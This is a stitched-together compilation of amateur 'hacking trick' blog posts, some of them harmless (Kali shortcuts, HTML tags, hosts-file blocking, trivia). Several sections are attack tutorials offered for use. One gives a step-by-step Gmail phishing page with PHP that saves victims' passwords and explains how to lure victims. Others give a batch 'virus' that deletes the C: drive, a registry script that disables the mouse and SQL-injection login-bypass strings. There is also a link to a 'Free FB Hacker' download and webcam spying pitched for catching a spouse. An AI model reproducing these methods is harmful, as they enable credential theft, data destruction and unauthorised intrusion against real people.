
What is Hacking?

Hacking is the gaining of access Wanted or Unwanted to a computer and viewing, copying, or creating data without the intention of destroying data or maliciously harming the computer.
What is a Hacker?
In one sense it's silly to argue about the true meaning of a word. A word means whatever people use it to mean. I can't force Newsweek to use the word Hacker or Programmer according to my official definition.
Still, understanding the etymological history of the word Hacker may help in understanding the current social situation. The concept of hacking entered the computer culture at the Massachusetts Institute of Technology in the 1960s. Popular opinion at MIT posited that there are two kinds of students, tools and hackers. A tool is someone who attends class regularly, is always to be found in the library when no class is meeting, and gets straight as a Hacker is the opposite: someone who never goes to class, who in fact sleeps all day, and who spends the night pursuing recreational activities rather than studying.
There was thought to be no middle ground.
What does this have to do with computers?
Originally, nothing. But there are standards for success as a hacker just as grades form a standard for success as a tool. The true hacker can't just sit around all night; he must pursue some hobby with dedication and flair. It can be telephones, railroads, science fiction fandom, ham radio, or broadcast radio. It can be more than one of these. Or it can be computers.
In 1986 the word hacker is generally used among MIT students to refer not to computer hackers but to building hackers, people who explore roofs and tunnels where they're not supposed to be a computer hacker then, is someone who lives and breathes computers, who knows all about computers, who can get a computer to do anything. Equally important, though, is the hacker's attitude.
Computer Programming must be ahobby, something done for fun, not out of a sense of duty or for the money.
It's okay to make money, but that can't be the reason for hacking.
A hacker is an aesthete. There are specialties within computer hacking. An algorithm hacker knows all about the best algorithm for any problem. A system hacker knows about designing and maintaining operating systems and a Password hacker knows how to find out someone else's password.
Someone who sets out to crack the security of a system for financial gain is not a hacker at all. It's not that a hacker can't be a thief, but a hacker can't be a professional thief. A hacker must be fundamentally an amateur, even though hackers can get paid for their expertise.
A password hacker whose primary interest is in learning how the system works doesn't therefore necessarily refrain from stealing information or services, but someone whose primary interest is in stealing isn't a hacker. It's a matter of emphasis Spyware:
A Program that was created by a person to watch the computer and it's actions and report the details to the origional maker.
A maliciously made program that is used to destroy data, or hurt the performance of the computer. Makes copies of itself and sends it to more people.


How to create fake or Phishing web page for Gmail

This post will explain you how to create fake or phishing web page for Gmail This Procedure can be used to make fake page for other websites like yahoo MSN or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page
Read Also Phishing and it's  defenses
Step 1. Go to the Gmail Save the Page as complet HTML
Step 2. Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from Google files There will be two image files namely google_transparent.gif and mail_logo.png
Step 3. Upload those image to TinyPic or Photobucket copy the url of each image.
Step4. Open the HTML file in Wordpad and Search for google_transparent.gif and replace it with corresponding url. Now search for mail_logo.png and replace it with corresponding url.
Step 5. Search for the
and replace it with action="http://yoursiteurlhere/login.php save the file.
Step 6. Now you need to create login.php so you need to open the notepad and type or copy the below codes:
<form action="/html/tags/html_form_tag_action.cfm" method="post">
<?php header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle =
fopen("pswrds.txt", "a"); foreach($_POST as
$variable => $value) {
fwrite($handle, $variable); fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n"); fclose($handle);
Step 7. Open the notepad and just save the file as pswrds.txt without any contents.
Now upload those three files namely index.html login.php pswrds.txt in any of subdomain Web hosting site.
Note: Use one of these sites: 007sites Web Hosting
Just Free Website
110mb Free Web Hosting
Use these sites through the secure connection sites so that you can hide IP Address like: This Website or find more site for best secure connection.
Step 8. Create an email with Gmail keyword
Step 9. Send to victim similar to gmail starts new feature to use this service log in to this page from that Gmail ID with link to your Phishing Web Page
Note: For user to believe change Your phishing web page url with any of free shortened url sites. This will make users to believe that it is correct url.
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How to Create Keyboard Shortcuts on Kali Linux

So actually how to make a keyboard shortcuts on Kali Linux?
If the case is you only want to run aterminal, you can try to press ALT+ F2 and type:
Now how if we want to make a Kali Linux keyboard shortcut?
First go to:
1. Applications –> System tools –> Preferences –>System Settings

2. On the System settings, find hardware group and choose keyboard
3. Choose and click shortcuts tab, and press the plus + sign at the bottom to add a new shortcut.
4. Put the name and the command (terminal)
5. Click the disabled area until it change the words to New accelerator.
6. Now you can choose which shortcut you want for your Kali Linux. In this example we use CTRL+ALT+ T to call the terminal. We can directly try our new kali linux keyboard settings.

Learn To Hide Files Behind The Images

There are some important files or document you want to hide from others on your computer and you might be creating folder inside folder to hide such files but in this tutorial i will change this by teaching you a interesting trick to hide files behind images. Hiding a file behind a image means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.
How To Hide File Behind Image?
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in
format with the help of the WinRAR
3. Paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of Command Line
4. Now open cmd by going to
Start>Accessories>Command Prompt
and type following commands in it.
5. CD stands for change directory by typing above command you can change your directory to desktop. After that type command given below.
Copy /b imagename.jpg + filename.rar finalimage.jpg
Replace image name jpg with the name of image you want your file to be hidden behind. Don't forget to add image format Eg:
jpg png gif
Replace file name with your desired file name and it must be in
Finally Replace final image jpg with whatever name you want your final image with hidden files should be.
This is the image where your file will be hidden
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need to follow the steps given below.
How To Access Hidden File? To access your hidden file you need to open the newly created image in WinRAR Just follow simple steps given below:
1. Open WinRAR
2. Now locate your image and open it or simply drag your image in WinRAR
3. Extract the file and done.


How to Like All Facebook Status Updates with A Single click

Do you know you can like all status updates on Facebook by just single click?
Facebook has become the single place where you can met your all time friends, by just sitting in front of your PC and you can talk, Comment, and Like your friends status on Facebook and it keeps maintain your friendships and gives you chance to comment or like your friend's gossips. Everyone wants that their status get as much as possible likes and same your friends also want.
For this whenever you see your best buddies status updates, you go and like it by clicking on like button but sometimes you don't have enough time to read all status and like them all particularly. And you can imagine what will happen if you miss to like your gf's/bf's any status!
So, guys I am here, for solving your this problem and giving you a trick for becoming a clever Boyfriend
sorry, if any girl is reading
Now you can like all status updates on Facebook Profiles and Pages with just a single click.
Facebook is getting more and more Application developer now-a-days, and one of them is a Google Chrome Extension This can like all status, images and comments of the profile page
Open your Facebook. and follow this guide to use this trick in your chrome web browser and like all facebook status updates with single click.
1.Open Google Chrome
2.Add Facebook Like All Extension Install it and then you can see fb like icon in your chrome upper right corner, just right after address box.
3.Now login with your facebook account and open any Facebook Profiles or Pages whose updates you want to like.
4.Then press the like button from upper right corner of Chrome Browser to like all updates and comments of that Pages.

Facebook Scams: Hacking any Facebook Account By Facebook Music Theme

A new Facebook scam which is claimed to be a script to Hack any Facebook Account is spreading like Wildfire.
Recently, i also came across a facebook scam post that promise a Facebook Music Theme I've been tagged in the spam post by more than 20 friends within a week. Sponsored Links The post has a link to a script file which is randomly hosted in Dropbox Pastebin Text uploader and other file hosting services.
The post tricks users into thinking that it is a script to hack any Facebook Account It urge users to use it before it is getting blocked by Facebook It asks them to copy the script and paste in the Console section of the Inspect element option in your browser.
It claims you will get username and password once you done the process.
Here is what exactly happening?
When you execute paste the code in the console section it will run the code on behalf you. So, it will send several requests including Like & Comment request.
It means that you are unknowingly Liked and Commented on the scammer's pages. It also tag all of your friends in a comment so that it can spread the scam further and get more victims.
I can't believe that there are still plenty of people out there who still believe some stupid scripts can hack accounts.
Are you one of the victim who followed the stupid instructions?

No need to panic. As far as i know, the script only "likes" & "comments" on behalf you. So, you can simply go to Activity Log Page in your account and unlike & uncomment them.
If you are reading this article, make sure you are not doing the same mistake again.

Password Guessing

This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess your password Hacker can also use combination of Social Engineering and Guessing to acquire your password.

→Don't use your name, surname, phone number or birthdate as your password.

→Try to avoid creating password that relates to you.

→Create complex and long password with combination of letters, numbers and panctuations

Rainbow Table

A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. password hash is a password that has gone through a mathematical algorithm such as MD5 and is transformed into something which is not recognizable.
A hash is a one way Encryption so once a password is hashed there is no way to get the original string from the hashed string.
A very commonly used hashing algorithm to store passwords in website databases is MD5. It is almost similar to Dictionary Attack. the only difference is, in Rainbow Tables Attack hashed characters are used as passwords whereas in Dictionary Attack. normal characters are used as passwords.
Example: 'hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string is d41d8cd98f00b204e9800998ecf8427e
Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime Hackers call the victim pretending to be from Bank and ask for their Credit Card details.
Social Engineering can be used to get someone password, to get bank credentials or any personal information.
If someone tries to get your personal or bank details ask them few questions or just ignore them. Make sure the person calling you is legit. Never ever give your credit card details on phone. Because not any bank or website in this world may ask about your credetials.Mind it

Make Dangerous Virus In A Moment

In my previous post i had teach you guys How To Make A Virus That Disable Mouse
In this post i will teach you to make simple and very powerful or you can say dangerous computer virus using a batch file.
No software is required to make this virus, Notepad is enough for it.
What will this virus do?
You will create this virus using batch file programming. This virus will delete the C Drive completely.
How to Make the virus?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Make A Virus That Disable Mouse

Today i will teach you how to make a batch virus which is harmfull it will disable your mouse so think before run it on your own computer.
Follow the steps carefully
1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse set key=
reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
2. Save this file as virus.bat
3. Done you just created your virus.


Turn Your WebCam into A Spy Cam

Today I'll tell you a Simple Way to Turn Your WebCam into a Spy Cam. You can now simply monitor your area, home or work place for activities occurring through out your absence without spending a penny on hidden cameras. I'll show you a simplest way to turn your laptop digital camera into a spy camera, this could be extremely handy to observe your kids or perhaps catch a cheating spouse red handed!
Here are few things that are required for this. Requirements
*Internet Connection So if you meet the above requirements, then next step on this website and you have to sign up Here This website provides a free solution to turn your Webcam into a Spy cam easily and start using their lovely service. Ugolog runs a web application inside the browser like Google Chrome Internet Explorer or Mozilla You don't need to install any additional software or application on your laptop.
Let me tell you few Advantages of ugolog. Advantages
*Its Free, You don't need to buy anything.
*No Installation Needed, Easy to setup.
*It has some powerful features like Motion Detection, Interval Snapshots and Email Alerts.
*You can view your Spy cam from anywhere, You just have to logged into it.
After signing up on it, Just take a quick tour or guide to setup things easily. The free version of ugolog have 50 MB Space and it monitors everything for 1 month. If you want to setup more than 1 webcams then you need additional space for recording more videos. For this, You can switch to Premium Plans.

Spy cam

A Spy Cam is a type of micro DVR which is built into a deceptive package and made to resemble a small object, such as a key fob, wrist watch or lipstick case. Known by numerous terms such as cam stick, Gum cam, thumb cam, etc., these devices will often function according to their apparent purpose, as in a pen cam that actually writes. They are often very cheap mini electronic devices with great flexibility.
Starting in 2008, spy cams became increasingly popular due to their falling prices. This was a consequence of advances in flash memory technology, which made available cheap, surface mount chips of over a giga-byte capacity, which meant that the cams could typically record over an hour of low resolution video onto built-in memory before needing to off load their recorded content. [citation needed] A typical spy cam is powered by a rechargeable lithium ion or lithium-ion polymer battery, has small, colored LEDs to indicate its operational status, and is controlled by switches and/or buttons on its surface. It may also have a slot/receptacle for a micro SD flash memory card which will expand its recording capacity by several hours. In order to off load the recorded video, it must be connected to a computer's USB port, at which point it will function as a conventional thumb drivethat contains standard video files. [citation needed] These days spy camera software Softcam is readily available for most digital devices that have a camera inbuilt.
These are available for PCs, laptops and even mobile phones. Although, there are laws in some countries against the use of Mobile phone camera without the knowledge of the target.

What is a webcam?

A webcam is a short form of web camera is a digital camera that’s connected to a computer. It can send live pictures from wherever it’s sited to another location by means of the internet. Many desktop computer screens and laptops come with a built-in camera and microphone, but if yours doesn’t, you can add a separate webcam at any time.
There are various types. Some are plugged into computers through USB ports, but others are wireless (wifi). Other features might include:
*An integral microphone
*the ability to pan and tilt
*In-built sensors that can detect movement and start recording
*A light that, when on, will let you know that the camera is in use.
There’s a wide range of things that you can do with a webcam. The most common is to video chat over the internet using Skype and always remember, and remind your children, that any images you make available to others via your webcam could remain on the internet forever.


How To Open Banned Websites WIth Proxy Sites

There are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many Online proxies but everyone need a proxy server which is faster and trusted.
Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open banned sites.
How To Open Banned Site? 1. Open Here in your browser.
You can also use any proxy site from the Google List Of Good Proxy Sites
2. After that enter the URL of the site which you want to open like below.
3. Now click the Hide Me button and enjoy.

MySQL Injection

MySQL Injection for absolute beginners PART 1 An SQL injection attack exploits vulnerabilities in a web server database that allow the attacker to gain access to the database and read, modify, or delete information. This article entitled "MySQL Injection for absolute beginners" intends to provide the complete knowledge and work-how of SQL injection specially targeted on MySQL database except the stacked query parts.
Introduction In this tutorial, I will demonstrate the infamous MySQL injection in newbie perspective so that all the newbies become able to become successful SQL injector. But, be sure to check various PHP & MySQL functions in various sites which will help you a lot...
Now lets begin our walk through of SQL injection. What Is Database? Just general info.. Database is the application that stores a collection of data. Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties. DB may hold various critical informations like usernames, passwords, credit cares,etc. So, DB need to be secured but many DB servers running are insecured either because of their vulnerability or because of poor programming handles. To name few DB servers, MySQL (Open source), MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite, etc. What Is SQL Injection? SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location. In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents. So lets head forward on our real walk through.. Bypassing Logins Suppose, a site has a login form & only the registered users are allowed to enter the site. Now, say u wanted to bypass the login and enter the site as the legitimate user. If the login script is not properly sanitized by the programmer, u may have luck to enter the site. U might be able to login into the site without knowing the real username and real password by just interacting with the DB server. So, isn't that the beauty of SQL injection??
Let's see an example, where the username admin with the password sam207 can login to the site. Suppose, the SQL query for this is carried out as below: Code: SELECT USER from database WHERE username='admin' AND password='sam207' And if above SELECT command evaluates true, user will be given access to the site otherwise not. Think what we could do if the script is not sanitized. This opens a door for the hackers to gain illegal access to the site. In this example, the attacker can enter the following user data in the login form: username:a or 1=1-- password:blank So, this would make our query as: Code: SELECT USER from database WHERE username='a' or 1=1-- AND password='' Note that -- is the comment operator and anything after it will be ignored as a comment. There exists another comment operator which is /*. So our above query becomes: Code: SELECT USER from database WHERE username='a' or 1=1 Now this query evaluates true even if there is no user called 'a' because 1=1 is always true and using OR makes the query return true when one of the query is true. And this gives access to the site admin panel. There can be various other username and password combinations to play with the vulnerable sites. U can create ur own new combinations for the site login. Few such combinations are: Code: username:' or 1='1 password:' or 1='1 username:' or '1'='1' password:' or '1'='1' username:or 1=1 password:or 1=1 and there are many more cheat sheets. Just google. In fact, you can create your own such combinations to bypass logins.. That's all about bypassing logins SQL injection


Use Mobile Camera As A Webcam With Your PC

In these days everyone are using mobiles phone with high features, Bluetooth and Camera is one of them which are commonly provided in the mobiles. In thistrickI am going to show you “How to use your mobile camera as a webcam with your PC during the video chat. So if you don’t have a webcam and does not want to waste money on buying a new one then thistrickis the best solution for you. For this mobile trick you need to have the Symbian mobile phone or Windows Mobile Phone. For this trick you have to download an application know as “Smatcam” which one is free of cost and this application only runs on symbian and Windows based phone. Below is the link to download this application for free. Click Here Steps to perform this mobile trick: Step1.Download this application and then you have to install it in your mobile phone as well as in your computer.(Note:: Install the Windows file in the computer and Mobile file in the mobile.) Step2.After this you have to connect your mobile phone and computer using Bluetooth. Step3.That’s it, Now you can use your mobile phone camera as a webcam. Here is the list of Nokia phones those supports this application:: 6650 N78 N96 6210 Navigator 6220 classic 5320 XpressMusic 6650 S60 3rd Edition, Feature Pack 1 (OS v9.2) 5700 XpressMusic 6110 Navigator 6120 classic 6121 classic 6124 classic 6290 E71 (320×240) E66 E51 E90 Communicator (800×352) N76 N81 N81 8GB N82 N95 N95 8GB N95-3 NAM S60 3rd Edition (initial release) (OS v9.1) 3250 (176×208) 5500 Sport (208×208) E61 (320×240) E61i (320×240) E62 (320×240) E50 E65 N71 N73 N77 N91 8GB (176×208) N92 N93 N93i E60 (352×416) E70 (352×416) N80 (352×416) ** S60 2nd Edition, Feature Pack 3 ** (OS v8.1a) N70 N72 N90 (352×416) ** S60 2nd Edition, Feature Pack 2 ** (OS v8.0a) 6630 6680 6681 6682 ** S60 2nd Edition, Feature Pack 1 ** (OS v7.0s) 3230 6260 6620 6670 7610 ** S60 2nd Edition (initial release) ** (OS v7.0s) 6600 S80 2nd Edition (OS v7.0s) 9300i (640×200) 9300 (640×200) 9500 (640×200) Other Series sometimes call S90(in fact no S90 of Developer Platform) (OS v7.0s) 7710 (640×320) (OS v6.0) 9210c Communicator (640×220) 9210i Communicator (640×220) 9290 Communicator (640×220)

HTML: Formatting elements

As you put as many texts as you can in your page, you will need new elements of formatting your page as you want and need. This formatting tags can make elements bold italic underlined etc
<p>Example of <b>Bold Text</b></p>
<p>Example of <em>Emphasized Text</em></p>
<p>Example of <strong>Strong Text</strong></p>
<p>Example of <i>Italic Text</i></p>
<p>Example of <sup>superscripted Text</sup></p>
<p>Example of <del>struckthrough Text</del></p>
<p>Example of <code>Computer Code Text</code></p>


Example of Bold Text
Example of Emphasized Text
Example of Strong Text
Example of Italic Text
Example of superscripted Text
Example of struckthrough Text
Example of Computer Code Text

Block any Website without Software

Now block any Website without any software. Well many of you wants you wants to block any webiste from your computer either for children saftey or for pesky porn website that's bothering you. Today I am going to share a very simple and easy method to Block any website without Software. It's a Simple Trick to block access to any Websites by editing hosts file in your windows system 32 folder. Just follow the instructions below to Block any Website.
Browse C:\WINDOWS\system32\drivers\etc Find the file named
hosts Open it in notepad Under local host Add www.site- name-you-want-to- block.com, and that site will no longer be accessable. Done..!

So Here is an example local host www.blockedsite.com -->

www.blockedsite.com is now unaccessable <--

For every site after that you want to add, just add "1" to the last Number in theinternal ip ( and then the add like before. For example: www.your- site-name.com www. your-site- name.com www. your-site- name.com etc…etc..
If you have any doubt in this Trick then Please feel free to ask in the comment section below. Enjoy..!!

Some Amazing Facts

Day is longer than the previous on by 0.00000002 seconds which is 13 seconds century. By reading this sentence you have lost 25,000,000 cells. Don't worry your body just made 300 billion more. The total combined weight of the worlds ant population is heavier than the weight of the human population. By rearranging the letters in "mother-in-law" you can create the words "woman Hitler" 360,000,000,000 photos are uploaded on Facebook year. Women have a better sense of smell than men. If you try to say the alphabet without moving your lips or tongue every letter will sound the same.(Yes boys n gals start it)............LOL... Enjoy............................


Free FB Hacker

The most advanced yet easy to use by everyone FB password hacking tool available to the public. Hacking FB passwords with FB hacker. Tested Virus/Spyware/Malware Free download Here! http://hack-fb.net/download.php


How to Hack/Unlock/Bypass android forgotten pattern

Unlocking android pattern lock is not a big thing if you remember it. Suppose if you forgot the pattern you have to choose forgot pattern and then it will let you to your gmail account to unlock your mobile. You need internet connection to access this. Suppose if you are in a place where there is no network coverage or you don’t have data plans on your mobile. So what would you do to unlock pattern in your android mobile? Will you hang your mobile with computer and try to unlock it with Android SDK? or will you take it to a mobile shop to unlock it? There are waste of time and money. You can unlock forgotten android pattern lock without internet access, Even without need of computer help. This article will help you to unlock android pattern lock without internet access and PC as well. 1) Remove the battery from your mobile phone and insert it again
2) Press on Volume up Button and hold it
3) Then press Home Button and hold it
4) Finally Power Button until you get Secrete android menu
5) Tap on home button for up and down in menu
6) Then tap on Delete all user data which will be in third one
This will delete all your data which includes unlock pattern. Then you can access your mobile fully. Once you forgotten your pattern unlock, Don’t panic and don’t took it to a care or local mobile shop. There are many ways to unlock the forgotten pattern unlock but this tutorial is easy, simple and free of cost
Disclaimer: This Is For Educational Purposes Only You Shall Not Use This On Other People Phones Without Permission Under Any Circumstances. I'm Not Responsible For Any Eventual Errors And Misbehaving Of Your Devices


How to hide Add Friend button on your facebook profile:

You all agree with me that Facebook is the most popular social networking. Most people and companies as well are already been using Facebook to promote, socialize, chat and play games. I used it as a tool to communicate with my friends but not with my family because they advised me not to use Social Networks so i decided to keep it private but recently I received so much friend request notifications and I thought this would reveal my identity. So I decided to limit those who can send request to me to be their friend. I manage to do some changes on my privacy setting. Hide "Add Friend" button So let start with the changes to HIDE "Add Friend" How to do it: 1) Sign in to your facebook account 2) Click the settings 3) Select Privacy settings 4) Select who can send me friend request 5) By default your setting are "Public" change this "Friends of Friends" Now your profile looks like this https://m.facebook.com/profile.php?id=100005183025957 6) Under the option "Who can send me friend request" there's a one more option "Who can send me message" click on that option, by default there's "Basic filter" change it to "Strict filter" now your frofile looks like this https://m.facebook.com/dmitry.ayzikov?_rdr Enjoy!